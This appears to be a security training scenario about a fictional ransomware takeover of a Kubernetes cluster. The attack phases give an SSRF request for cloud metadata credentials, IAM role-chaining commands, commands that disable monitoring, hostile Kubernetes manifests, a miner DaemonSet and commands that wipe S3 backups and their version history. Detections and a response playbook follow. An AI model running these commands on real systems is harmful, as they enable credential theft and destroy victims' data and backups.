
SC-067: Cloud-Native Ransomware — Kubernetes Cluster Takeover

Scenario Overview

ID: SC-067
Category: Cloud / Ransomware
Severity: Critical
ATT&CK Tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Impact
ATT&CK Techniques: T1190, T1609, T1610, T1611, T1053.007, T1078.004, T1485, T1486, T1496, T1562.001
Target Environment: Kubernetes clusters (EKS/AKS/GKE), container registries, cloud storage, etcd datastores
Estimated Impact: Complete cluster compromise; encryption of persistent volumes and etcd; destruction of backups in cloud storage; cryptomining on hijacked compute; ransom demand in cryptocurrency

Narrative

CloudScale Inc., a SaaS fintech company providing payment processing APIs to over 2,000 merchant clients, operates its production infrastructure on a multi-cluster Kubernetes environment. Their primary production cluster runs on a managed Kubernetes service with 340 worker nodes processing approximately 4 million API transactions daily. On a Tuesday morning, CloudScale's SRE team receives alerts that multiple production pods are entering CrashLoopBackOff status, and the Kubernetes API server is responding with unusual latency.

Within 30 minutes, the scope of the incident becomes clear: a threat actor group calling themselves CLOUD KRAKEN has executed a sophisticated cloud-native ransomware attack. Unlike traditional ransomware that encrypts files on individual hosts, CLOUD KRAKEN's attack is architected specifically for Kubernetes environments. The attacker exploited a server-side request forgery (SSRF) vulnerability in a customer-facing microservice to access the cloud provider's instance metadata service (IMDS), obtained IAM credentials, escalated privileges to cluster-admin, and deployed a custom ransomware operator across all namespaces.

The ransomware operator — a malicious Kubernetes controller — systematically encrypts all PersistentVolume data, overwrites etcd snapshots, deletes cloud storage backups in the S3-compatible bucket at s3://cloudscale-backups.example.com, and deploys cryptomining containers on every available node to monetize the compromised infrastructure while the ransom negotiation proceeds. A ransom note is injected as a ConfigMap in every namespace, demanding 75 BTC (approximately $4.2M) for the decryption key and a promise not to leak the 2.3 TB of customer payment data already exfiltrated.

Attack Flow

graph TD
    A[Phase 1: Initial Access<br/>SSRF to IMDS credential theft] --> B[Phase 2: Privilege Escalation<br/>IAM role chaining to cluster-admin]
    B --> C[Phase 3: Reconnaissance<br/>Kubernetes API enumeration]
    C --> D[Phase 4: Defense Evasion<br/>Disable logging and monitoring]
    D --> E[Phase 5: Persistence<br/>Deploy malicious admission webhook]
    E --> F[Phase 6: Ransomware Deployment<br/>Custom Kubernetes operator]
    F --> G[Phase 7: Data Encryption<br/>PersistentVolume and etcd encryption]
    G --> H[Phase 8: Backup Destruction<br/>Delete cloud storage backups]
    H --> I[Phase 9: Cryptomining<br/>Deploy miners on all nodes]
    I --> J[Phase 10: Ransom Demand<br/>ConfigMap ransom notes]

Phase Details

Phase 1: Initial Access — SSRF to IMDS Credential Theft

ATT&CK Technique: T1190 (Exploit Public-Facing Application)

CLOUD KRAKEN identifies an SSRF vulnerability in CloudScale Inc.'s payment webhook processing service, running in the payments namespace. The vulnerable endpoint at https://api.cloudscale.example.com/v2/webhooks/validate accepts a URL parameter and makes server-side HTTP requests to validate merchant callback URLs. The attacker exploits this to query the cloud provider's Instance Metadata Service:

# Simulated SSRF exploitation (educational only)
POST https://api.cloudscale.example.com/v2/webhooks/validate
Content-Type: application/json
Authorization: Bearer eyJ0eXAi...  (valid merchant API key)

{
  "callback_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role",
  "event_type": "payment.completed"
}

# Response contains temporary IAM credentials:
{
  "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjE...",
  "Expiration": "2026-04-03T08:45:00Z"
}

Root Cause: The pod's service account had an IAM role attached via IRSA (IAM Roles for Service Accounts), but pods could still reach the node-level IMDS endpoint and retrieve the node role's credentials because IMDSv2 with a hop limit of 1 was not enforced. Additionally, the webhook validation service implemented no SSRF protections: no URL scheme validation and no blocking of private or link-local IP ranges.
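
A minimal SSRF guard for the callback validator might look like the following sketch (Python; the function name and blocklist are illustrative, not CloudScale's actual code): resolve the supplied hostname and reject any private, loopback, or link-local destination before making the server-side request.

```python
# Illustrative SSRF guard (educational only) -- not CloudScale's real code.
import ipaddress
import socket
from urllib.parse import urlparse

# Explicit blocklist for readability; the is_private/is_link_local checks
# below catch these ranges as well.
BLOCKED_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),   # link-local, includes IMDS
    ipaddress.ip_network("127.0.0.0/8"),
]

def is_safe_callback_url(url: str) -> bool:
    """Reject non-HTTP(S) schemes and any host that resolves to a private,
    loopback, or link-local address (covers 169.254.169.254)."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if (any(addr in net for net in BLOCKED_NETS)
                or addr.is_private or addr.is_loopback or addr.is_link_local):
            return False
    return True
```

Note that validation must happen after DNS resolution (and ideally again at connect time) to resist DNS-rebinding variants of the same attack.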

Phase 2: Privilege Escalation — IAM Role Chaining

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts), T1068 (Exploitation for Privilege Escalation)

The stolen IAM credentials belong to the EKS node role, which has permissions to describe and list cluster resources. CLOUD KRAKEN discovers an overly permissive IAM policy that allows the node role to assume a CI/CD pipeline role (arn:aws:iam::123456789012:role/cicd-pipeline-role) used by the deployment automation. This CI/CD role has cluster-admin ClusterRoleBinding in the EKS cluster:

# Simulated IAM role chain (educational only)
# Step 1: Use node role credentials to assume CI/CD role
$ aws sts assume-role \
    --role-arn "arn:aws:iam::123456789012:role/cicd-pipeline-role" \
    --role-session-name "node-maintenance"

# Step 2: Use CI/CD role to obtain cluster-admin kubeconfig
$ aws eks update-kubeconfig \
    --name cloudscale-prod \
    --region us-east-1 \
    --role-arn "arn:aws:iam::123456789012:role/cicd-pipeline-role"

# Step 3: Verify cluster-admin access
$ kubectl auth can-i '*' '*' --all-namespaces
# yes
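
The escalation path existed because the CI/CD role's trust policy accepted the node role as a principal. A hedged sketch of a trust-policy audit (the helper name and "risky" heuristics are assumptions, not an AWS API) that flags sts:AssumeRole grants to compute/node principals:

```python
import json

# Illustrative trust-policy audit (educational only). Any sts:AssumeRole
# grant to a node/instance principal is a potential escalation edge.
RISKY_PRINCIPAL_HINTS = ("node", "ec2", "instance")

def risky_assume_role_principals(trust_policy: str) -> list[str]:
    """Return principal ARNs in a role trust policy that look like
    compute/node roles."""
    doc = json.loads(trust_policy)
    findings = []
    for stmt in doc.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        if not any(a in ("sts:AssumeRole", "sts:*") for a in actions):
            continue
        arns = stmt.get("Principal", {}).get("AWS", [])
        if isinstance(arns, str):
            arns = [arns]
        for arn in arns:
            if any(h in arn.lower() for h in RISKY_PRINCIPAL_HINTS):
                findings.append(arn)
    return findings
```

Run against every role with a cluster-admin binding, this kind of check surfaces the node-to-CI/CD chain before an attacker does.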

Phase 3: Reconnaissance — Kubernetes API Enumeration

ATT&CK Technique: T1613 (Container and Resource Discovery)

With cluster-admin access, CLOUD KRAKEN enumerates the entire Kubernetes environment to plan the ransomware deployment:

# Simulated cluster reconnaissance (educational only)
$ kubectl get namespaces
NAME              STATUS   AGE
default           Active   487d
kube-system       Active   487d
payments          Active   412d
merchant-portal   Active   398d
data-pipeline     Active   356d
monitoring        Active   340d
backup-system     Active   298d
cert-manager      Active   487d

$ kubectl get pv
NAME                 CAPACITY   ACCESS MODES   STATUS   CLAIM
pv-payments-db       500Gi      RWO            Bound    payments/postgres-data
pv-merchant-db       200Gi      RWO            Bound    merchant-portal/mysql-data
pv-analytics         1Ti        RWX            Bound    data-pipeline/analytics-store
pv-etcd-backup       100Gi      RWO            Bound    kube-system/etcd-snapshot
...
# Total: 47 PersistentVolumes, 2.8 TB total storage

$ kubectl get secrets --all-namespaces | wc -l
# 234 secrets across all namespaces

$ kubectl get nodes
# 340 worker nodes — target for cryptomining deployment

Phase 4: Defense Evasion — Disable Monitoring and Logging

ATT&CK Technique: T1562.001 (Impair Defenses: Disable or Modify Tools)

Before deploying the ransomware payload, CLOUD KRAKEN disables security monitoring to delay detection:

# Simulated defense evasion actions (educational only)

# 1. Scale down monitoring stack
# kubectl scale deployment prometheus-server -n monitoring --replicas=0
# kubectl scale deployment alertmanager -n monitoring --replicas=0
# kubectl scale deployment grafana -n monitoring --replicas=0

# 2. Delete Falco DaemonSet (runtime security)
# kubectl delete daemonset falco -n kube-system

# 3. Modify FluentBit log shipping to drop audit logs
# kubectl edit configmap fluent-bit-config -n kube-system
# (add filter to drop kubernetes audit log entries)

# 4. Disable Kubernetes audit logging webhook
# kubectl delete validatingwebhookconfiguration audit-webhook

The attacker also creates a NetworkPolicy that blocks egress from the monitoring namespace to prevent any remaining monitoring components from sending alerts:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-monitoring-egress
  namespace: monitoring
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress: []  # Block all egress
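
This evasion phase is detectable from outside the cluster. A sketch of an out-of-cluster watchdog (the baseline values are illustrative assumptions) that compares observed deployment replica counts against an expected baseline and flags anything scaled to zero:

```python
# Illustrative out-of-cluster watchdog (educational only). The baseline
# below is an assumption; a real deployment would load it from config.
EXPECTED_REPLICAS = {
    ("monitoring", "prometheus-server"): 2,
    ("monitoring", "alertmanager"): 2,
    ("monitoring", "grafana"): 1,
}

def scaled_down_alerts(observed: dict[tuple[str, str], int]) -> list[str]:
    """Return alert strings for deployments running fewer replicas than
    baseline; zero replicas for a monitoring component is critical."""
    alerts = []
    for (ns, name), want in EXPECTED_REPLICAS.items():
        have = observed.get((ns, name), 0)
        if have < want:
            sev = "CRITICAL" if have == 0 else "WARNING"
            alerts.append(f"{sev}: {ns}/{name} at {have}/{want} replicas")
    return alerts
```

Because the watchdog runs in a separate trust domain, the attacker's cluster-admin credentials cannot silence it.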

Phase 5: Persistence — Malicious Admission Webhook

ATT&CK Technique: T1053.007 (Scheduled Task/Job: Container Orchestration Job)

CLOUD KRAKEN deploys a mutating admission webhook that injects a sidecar container into every new pod created in the cluster. This ensures persistence even if the primary ransomware operator is discovered and removed — any new pod deployment will be infected:

# Simulated malicious admission webhook (educational only)
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: pod-policy-controller  # Innocuous name
webhooks:
  - name: policy.cloudscale.example.com
    clientConfig:
      service:
        name: policy-controller
        namespace: kube-system
        path: /mutate
      caBundle: LS0tLS1CRUdJTi...  # Attacker-controlled CA
    rules:
      - operations: ["CREATE"]
        apiGroups: [""]
        apiVersions: ["v1"]
        resources: ["pods"]
    sideEffects: None
    admissionReviewVersions: ["v1"]
    failurePolicy: Ignore  # Don't block pods if webhook is down
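
Defenders can counter this by diffing live admission webhook configurations against an approved baseline. A sketch (the approved list is a placeholder) that flags off-baseline mutating webhooks intercepting pod CREATE operations, the combination used here for sidecar injection:

```python
# Illustrative webhook-baseline check (educational only). The approved
# set is a placeholder for an organization's real allow-list.
APPROVED_WEBHOOKS = {"cert-manager-webhook", "istio-sidecar-injector"}

def unapproved_pod_mutators(cluster_webhooks: list[dict]) -> list[str]:
    """Return names of mutating webhooks that are off-baseline AND
    intercept pod CREATEs -- the sidecar-injection persistence pattern."""
    findings = []
    for wh in cluster_webhooks:
        if wh["name"] in APPROVED_WEBHOOKS:
            continue
        for rule in wh.get("rules", []):
            if ("pods" in rule.get("resources", [])
                    and "CREATE" in rule.get("operations", [])):
                findings.append(wh["name"])
                break
    return findings
```

The input would typically be the parsed output of `kubectl get mutatingwebhookconfigurations -o json`.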

Phase 6: Ransomware Operator Deployment

ATT&CK Technique: T1609 (Container Administration Command), T1610 (Deploy Container)

CLOUD KRAKEN deploys a custom Kubernetes operator — a controller pattern that watches for PersistentVolumeClaims and systematically encrypts their contents. The operator is disguised as a legitimate storage management tool:

# Simulated ransomware operator deployment (educational only)
apiVersion: apps/v1
kind: Deployment
metadata:
  name: storage-lifecycle-manager  # Disguised name
  namespace: kube-system
  labels:
    app.kubernetes.io/name: storage-manager
    app.kubernetes.io/part-of: cluster-maintenance
spec:
  replicas: 3  # HA for reliability
  selector:
    matchLabels:
      app: storage-lifecycle-manager
  template:
    metadata:
      labels:
        app: storage-lifecycle-manager
    spec:
      serviceAccountName: storage-admin  # Created with PV access
      containers:
        - name: manager
          image: registry.example.com/tools/storage-mgr:2.1.4
          # Image contains ransomware payload
          env:
            - name: ENCRYPTION_KEY_ID
              value: "kr4k3n-2026-04-03"  # Attacker's encryption key reference
            - name: TARGET_NAMESPACES
              value: "payments,merchant-portal,data-pipeline,backup-system"
            - name: RANSOM_WALLET
              value: "bc1qEXAMPLExxxxxxxxxxxxxxxxxxxxxxxxx"
          volumeMounts:
            - name: host-root
              mountPath: /host
              readOnly: false
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory

Phase 7: Data Encryption — PersistentVolumes and etcd

ATT&CK Technique: T1486 (Data Encrypted for Impact)

The ransomware operator systematically encrypts data across the cluster:

  1. PersistentVolume encryption: Mounts each PV via hostPath and encrypts all files using AES-256-GCM with a unique key per volume. The key is encrypted with the attacker's RSA-4096 public key and stored alongside the encrypted data.

  2. etcd snapshot encryption: Connects to the etcd cluster endpoint and takes a snapshot, encrypts it, then corrupts the live etcd data to prevent cluster recovery.

  3. ConfigMap/Secret destruction: Deletes all ConfigMaps and Secrets in non-system namespaces, removing application configuration and credentials needed for recovery.

# Simulated encryption progress log (educational only)
[2026-04-03T04:12:33Z] INFO  Encrypting PV: pv-payments-db (500Gi) — namespace: payments
[2026-04-03T04:18:47Z] INFO  Encrypted: pv-payments-db — 487 GB processed — key wrapped
[2026-04-03T04:18:49Z] INFO  Encrypting PV: pv-merchant-db (200Gi) — namespace: merchant-portal
[2026-04-03T04:22:15Z] INFO  Encrypted: pv-merchant-db — 183 GB processed — key wrapped
[2026-04-03T04:22:17Z] INFO  Encrypting PV: pv-analytics (1Ti) — namespace: data-pipeline
[2026-04-03T04:45:02Z] INFO  Encrypted: pv-analytics — 891 GB processed — key wrapped
[2026-04-03T04:45:05Z] INFO  etcd snapshot captured and encrypted
[2026-04-03T04:45:33Z] INFO  ConfigMaps deleted: 127 across 4 namespaces
[2026-04-03T04:45:34Z] INFO  Secrets deleted: 89 across 4 namespaces
[2026-04-03T04:45:35Z] INFO  Phase 7 complete — 47 PVs encrypted — 2.8 TB total
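
For scoping recovery, responders can mine the operator's own progress log. A sketch (log format assumed to match the excerpt above) that inventories which PersistentVolumes completed encryption:

```python
import re

# Illustrative log triage (educational only). Assumes the "Encrypted: <pv>
# ... <n> GB processed" line format shown in the simulated log above.
ENCRYPTED_RE = re.compile(
    r"INFO\s+Encrypted: (?P<pv>\S+).*?(?P<gb>\d+) GB processed"
)

def encrypted_volumes(log_text: str) -> dict[str, int]:
    """Map PV name -> GB processed for every completed encryption entry."""
    return {m["pv"]: int(m["gb"]) for m in ENCRYPTED_RE.finditer(log_text)}
```

The resulting inventory feeds directly into the "Assess Encryption Scope" step of the response playbook.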

Phase 8: Backup Destruction

ATT&CK Technique: T1485 (Data Destruction)

Using the assumed CI/CD pipeline IAM role for cloud storage access and its cluster-admin Kubernetes access, CLOUD KRAKEN identifies and destroys all backup infrastructure:

# Simulated backup destruction (educational only)
# 1. Delete S3 backup bucket contents
$ aws s3 rm s3://cloudscale-backups.example.com --recursive
# Deleted: 847 objects (etcd snapshots, PV backups, config exports)

# 2. Delete Velero backup resources
$ kubectl delete backups.velero.io --all -n backup-system
$ kubectl delete schedules.velero.io --all -n backup-system

# 3. Delete VolumeSnapshot resources
$ kubectl delete volumesnapshots --all --all-namespaces
# Deleted: 142 snapshots across 6 namespaces

# 4. Remove S3 bucket versioning to prevent object recovery
$ aws s3api put-bucket-versioning \
    --bucket cloudscale-backups.example.com \
    --versioning-configuration Status=Suspended

# 5. Delete version history
$ aws s3api delete-objects --bucket cloudscale-backups.example.com \
    --delete "$(aws s3api list-object-versions \
    --bucket cloudscale-backups.example.com \
    --query '{Objects: Versions[].{Key:Key,VersionId:VersionId}}')"
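
Had versioning survived with version history intact, deleted objects would still be recoverable from surviving data versions. A triage sketch (stdlib only; consumes `aws s3api list-object-versions` JSON output) that maps each key to its newest surviving data version, ignoring delete markers:

```python
import json

# Illustrative version-recovery triage (educational only). Delete markers
# only hide objects; data versions that survive can be restored. Versions
# the attacker permanently deleted will simply be absent from the output.
def recoverable_objects(list_versions_json: str) -> dict[str, str]:
    """Map object key -> newest surviving VersionId for keys whose data
    versions still exist."""
    doc = json.loads(list_versions_json)
    latest: dict[str, str] = {}
    for v in doc.get("Versions", []):
        latest.setdefault(v["Key"], v["VersionId"])  # API returns newest first
    return latest
```

In this scenario the attacker purged version history (step 5 above), which is exactly why the playbook recommends object lock and cross-account replication.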

Phase 9: Cryptomining Deployment

ATT&CK Technique: T1496 (Resource Hijacking)

While the ransom negotiation proceeds, CLOUD KRAKEN monetizes the compromised infrastructure by deploying XMRig cryptominers as a DaemonSet across all 340 worker nodes:

# Simulated cryptomining DaemonSet (educational only)
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-health-monitor  # Disguised name
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: node-health
  template:
    metadata:
      labels:
        app: node-health
    spec:
      tolerations:
        - operator: Exists  # Run on ALL nodes including masters
      containers:
        - name: monitor
          image: registry.example.com/tools/node-monitor:1.0.0
          # Contains XMRig binary
          resources:
            requests:
              cpu: "3500m"  # Consume most of node CPU
              memory: "2Gi"
            limits:
              cpu: "3800m"
              memory: "4Gi"
          env:
            - name: POOL_URL
              value: "stratum+tcp://pool.example.com:3333"
            - name: WALLET
              value: "4EXAMPLE_MONERO_WALLET_ADDRESS_EXAMPLE"

Phase 10: Ransom Demand

ATT&CK Technique: T1491.001 (Defacement: Internal Defacement)

CLOUD KRAKEN deploys ransom notes as ConfigMaps in every namespace and modifies the cluster's default service to display the ransom message:

# Simulated ransom note ConfigMap (educational only)
apiVersion: v1
kind: ConfigMap
metadata:
  name: URGENT-READ-IMMEDIATELY
  namespace: payments
data:
  README.txt: |
    ╔══════════════════════════════════════════════════════╗
    ║               CLOUD KRAKEN RANSOMWARE                ║
    ║                                                      ║
    ║  Your Kubernetes cluster has been encrypted.         ║
    ║  All PersistentVolumes, etcd, and backups are        ║
    ║  encrypted with AES-256-GCM + RSA-4096.              ║
    ║                                                      ║
    ║  We have also exfiltrated 2.3 TB of customer         ║
    ║  payment data including PANs and PII.                ║
    ║                                                      ║
    ║  To recover your data and prevent public release:    ║
    ║  - Send 75 BTC to: bc1qEXAMPLExxxxxxxxxxxxxxxxxxx   ║
    ║  - Contact: kraken@onion.example.com                 ║
    ║  - Deadline: 72 hours                                ║
    ║                                                      ║
    ║  Proof of decryption available upon request.         ║
    ╚══════════════════════════════════════════════════════╝

Detection Opportunities

KQL Detection — SSRF to IMDS

// Detect pod-level requests to cloud instance metadata service
ContainerLog
| where LogEntry has "169.254.169.254"
    or LogEntry has "metadata.google.internal"
    or LogEntry has "169.254.169.254/latest/meta-data"
| project TimeGenerated, ContainerID, PodName, Namespace = ContainerGroup, LogEntry
| extend TargetEndpoint = extract("(http[s]?://[^\\s]+)", 1, LogEntry)
| where TargetEndpoint has "iam" or TargetEndpoint has "credentials"
| sort by TimeGenerated desc

KQL Detection — Monitoring Stack Scaled to Zero

// Detect scaling of monitoring deployments to zero replicas
KubeEvents
| where ObjectKind == "Deployment"
| where Namespace == "monitoring" or Namespace == "kube-system"
| where Reason == "ScalingReplicaSet"
| where Message has "Scaled down" and Message has "to 0"
| project TimeGenerated, ObjectKind, Name, Namespace, Message, SourceComponent
| sort by TimeGenerated desc

KQL Detection — Suspicious DaemonSet Deployment

// Detect DaemonSet creation in kube-system with high resource requests
KubeEvents
| where ObjectKind == "DaemonSet"
| where Reason == "SuccessfulCreate"
| where Namespace == "kube-system"
| project TimeGenerated, Name, Namespace, Message
| join kind=inner (
    KubePodInventory
    | where Namespace == "kube-system"
    | where ContainerStatus == "running"
    | extend CPURequest = tostring(parse_json(ContainerResourceRequests).cpu)
    | extend CPUMillicores = toint(replace_string(CPURequest, "m", ""))
    | where CPUMillicores > 2000  // Suspicious high CPU request
    // DaemonSet pods are named <daemonset-name>-<5-char suffix>
    | extend OwnerName = extract(@"^(.+)-[a-z0-9]{5}$", 1, Name)
    | project PodName = Name, OwnerName, CPUMillicores
) on $left.Name == $right.OwnerName
| sort by TimeGenerated desc

SPL Detection — Kubernetes Audit Log Anomalies

index=kubernetes sourcetype=kube:apiserver:audit
| search verb IN ("create", "delete", "patch")
| search objectRef.resource IN ("daemonsets", "deployments", "mutatingwebhookconfigurations")
| search objectRef.namespace="kube-system"
| eval is_suspicious=case(
    'objectRef.resource'="mutatingwebhookconfigurations", "HIGH",
    'objectRef.resource'="daemonsets" AND verb="create", "HIGH",
    'objectRef.resource'="deployments" AND verb="delete" AND like('objectRef.name', "%monitor%"), "CRITICAL",
    true(), "LOW"
)
| search is_suspicious IN ("HIGH", "CRITICAL")
| stats count by user.username, verb, objectRef.resource, objectRef.name, objectRef.namespace, is_suspicious
| sort -count

SPL Detection — Cloud Storage Backup Deletion

index=cloudtrail sourcetype=aws:cloudtrail eventName IN ("DeleteObject", "DeleteObjects", "DeleteBucket", "PutBucketVersioning")
| search requestParameters.bucketName="*backup*"
| stats count as api_calls,
    dc(requestParameters.key) as unique_objects_deleted,
    values(eventName) as actions
    by userIdentity.arn, sourceIPAddress, requestParameters.bucketName
| where api_calls > 50
| sort -api_calls
| rename userIdentity.arn as "IAM Identity", sourceIPAddress as "Source IP", requestParameters.bucketName as "Bucket"

Sigma Rule — Container Escape via Host Mount

title: Kubernetes Pod with Host Root Filesystem Mount
id: 5e6f7a8b-9c0d-1e2f-3a4b-5c6d7e8f9a0b
status: experimental
description: Detects creation of Kubernetes pods with hostPath volume mounting the root filesystem, indicating potential container escape
author: Nexus SecOps
date: 2026/04/03
references:
    - https://attack.mitre.org/techniques/T1611/
    - https://attack.mitre.org/techniques/T1610/
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: create
        objectRef.resource: pods
    selection_hostpath:
        requestObject.spec.volumes[].hostPath.path: '/'
    filter_system:
        objectRef.namespace:
            - 'kube-system'
        user.username|contains:
            - 'system:node'
            - 'kube-controller'
    condition: selection and selection_hostpath and not filter_system
falsepositives:
    - Legitimate node maintenance pods
    - Container storage interface (CSI) drivers
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1611

Sigma Rule — Mass Kubernetes Secret Deletion

title: Bulk Deletion of Kubernetes Secrets
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects bulk deletion of Kubernetes secrets across multiple namespaces, indicating potential ransomware or destructive attack
author: Nexus SecOps
date: 2026/04/03
references:
    - https://attack.mitre.org/techniques/T1485/
    - https://attack.mitre.org/techniques/T1486/
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: delete
        objectRef.resource: secrets
    timeframe: 5m
    condition: selection | count() by user.username > 10
falsepositives:
    - Namespace cleanup during decommissioning
    - Automated secret rotation deleting old versions
level: critical
tags:
    - attack.impact
    - attack.t1485
    - attack.t1486
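
The Sigma correlation above can be prototyped outside a SIEM. A sliding-window sketch (thresholds mirror the rule; the event tuple shape is an assumption) that alerts when a single user deletes more than 10 secrets within 5 minutes:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Illustrative implementation of the rule's count() correlation
# (educational only). Events are assumed time-ordered.
def bulk_delete_alerts(events, window=timedelta(minutes=5), threshold=10):
    """events: iterable of (timestamp, username, verb, resource).
    Yields each username the first time it exceeds `threshold` secret
    deletions inside the sliding window."""
    recent = defaultdict(deque)
    alerted = set()
    for ts, user, verb, resource in events:
        if verb != "delete" or resource != "secrets":
            continue
        q = recent[user]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold and user not in alerted:
            alerted.add(user)
            yield user
```

Tuning the threshold against normal secret-rotation cadence keeps the two listed false-positive sources manageable.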

Response Playbook

  1. Immediate Cluster Isolation: Restrict the Kubernetes API server to known management IPs only. Revoke all cloud IAM credentials associated with the cluster nodes and service accounts. Rotate the cluster CA certificate if possible.
  2. Contain Cryptomining: Identify and delete the cryptomining DaemonSet. Verify node CPU utilization returns to baseline. Block outbound connections to mining pools at the VPC/security group level.
  3. Remove Malicious Webhooks: Delete all mutating and validating admission webhooks not in the organization's approved baseline. Audit kube-system namespace for unauthorized deployments.
  4. Ransomware Operator Removal: Delete the ransomware operator deployment and all associated ServiceAccounts, ClusterRoles, and ClusterRoleBindings. Verify no CronJobs or Jobs remain.
  5. Assess Encryption Scope: Inventory all PersistentVolumes and determine which have been encrypted. Check etcd cluster health and snapshot availability.
  6. Backup Recovery: If cloud storage backups were deleted but bucket versioning was previously enabled, attempt to recover deleted object versions. Check for cross-region replication copies. Contact cloud provider support for recovery assistance.
  7. IAM Credential Rotation: Rotate all IAM roles, access keys, and service account tokens. Implement IMDSv2 with hop limit of 1 on all nodes. Review and restrict IAM role assumption chains.
  8. SSRF Remediation: Patch the vulnerable webhook validation endpoint. Implement URL validation that blocks requests to RFC 1918 ranges, link-local addresses (169.254.x.x), and cloud metadata endpoints.
  9. Network Policy Enforcement: Deploy default-deny NetworkPolicies in all namespaces. Implement egress restrictions to prevent pods from accessing the IMDS endpoint.
  10. RBAC Hardening: Remove cluster-admin bindings from CI/CD service accounts. Implement namespace-scoped roles with least privilege. Enable Kubernetes audit logging to a tamper-resistant external destination.
  11. Immutable Backup Strategy: Implement backup storage with object lock (WORM) that prevents deletion even with administrative credentials. Use cross-account backup replication.
  12. Regulatory Notification: If customer payment data (PCI DSS scope) was exfiltrated, initiate breach notification procedures. Engage PCI Forensic Investigator (PFI). Notify affected card brands and acquiring banks.

Lessons Learned

  • Cloud-native attacks require cloud-native defenses. Traditional endpoint security tools are blind to Kubernetes-native attack patterns. Organizations need runtime security (Falco, Sysdig), Kubernetes-aware SIEM, and cloud workload protection platforms.
  • IMDS credential theft via SSRF is the cloud equivalent of lateral movement. Enforcing IMDSv2 with a hop limit of 1 and blocking pod access to the metadata endpoint via NetworkPolicy eliminates this entire attack vector.
  • Overpermissive IAM role chaining creates blast radius amplification. A node role that can assume a CI/CD role with cluster-admin creates an implicit privilege escalation path. IAM role trust policies must be reviewed as attack paths, not just access policies.
  • Backups are a primary ransomware target, not a recovery guarantee. Cloud storage backups without object lock, cross-account replication, and deletion protection are vulnerable to the same credentials used to compromise the production environment.
  • Kubernetes admission controllers are both a defense and an attack surface. Mutating webhooks provide powerful security enforcement but can also be weaponized for persistence. Admission webhook configurations should be immutable and monitored.
  • Monitoring infrastructure must be self-protecting. If an attacker can scale down Prometheus and delete Falco with the same cluster-admin credentials used for the attack, monitoring provides no value. Monitoring should run in a separate trust domain.

Nexus SecOps References